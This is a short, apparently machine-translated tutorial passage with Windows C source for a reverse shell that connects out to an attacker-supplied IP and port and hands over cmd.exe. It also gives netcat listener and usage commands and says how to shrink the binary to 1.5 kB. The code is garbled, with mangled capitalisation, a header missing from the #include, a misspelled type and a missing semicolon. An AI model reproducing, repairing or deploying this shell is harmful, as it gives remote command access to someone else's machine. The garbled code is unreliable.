Let's take a look at the following procedure,:
#include
#pragma comment (Lib, "WS2_32")
INT main (int Argc, char ** argv)
{
Wsadata wsadata;
Socket hsocket;
Startupinfo Si;
Process_information pi;
Struct SockAddr_in Adik_sin;
MEMSET (& Adik_sin, 0, sizeof (adik_sin));
MEMSET (& Si, 0, SIZEOF (SI));
WSASTARTUP (Makeword (2,0), & wsadata);
HSocket = WSASOCKET (AF_INET, SOCK_STREAM, NULL, NULL, NULL, NULL);
Adik_sin.sin_family = af_INet;
Adik_sin.sin_port = htons (ATOI (ARGV [2]));
Adik_sin.sin_addr.s_addr = inet_addr (argv [1]);
IF (0! = Connect (hsocket, (struct socmeddr *) & adik_sin, sizeof (adik_sin)))
Return -1;
Si.cb = sizeof (si);
Si.dwflags = startf_usestdhandles;
Si.hstdinput = si.hstdoutput = si.hstderror = (void *) hsocket;
CreateProcess (NULL, "CMD.exe", NULL, NULL, 1, NULL, NULL, NULL, & SI, & PI)
Return 0;
}
Its function is simple, it is reverse connection.
First use NC listening ports:
Nc.exe -lp 5555
The program is executed by the command line:
Sameple.exe 127.0.0.1 5555
Finally get a cmdshell
Let's build in the release version, eventually generate size 23 K. We use TinyFrame to generate once, final size: 1.50 kB, very attractive to right. Oh, let's talk about the installation and use process.
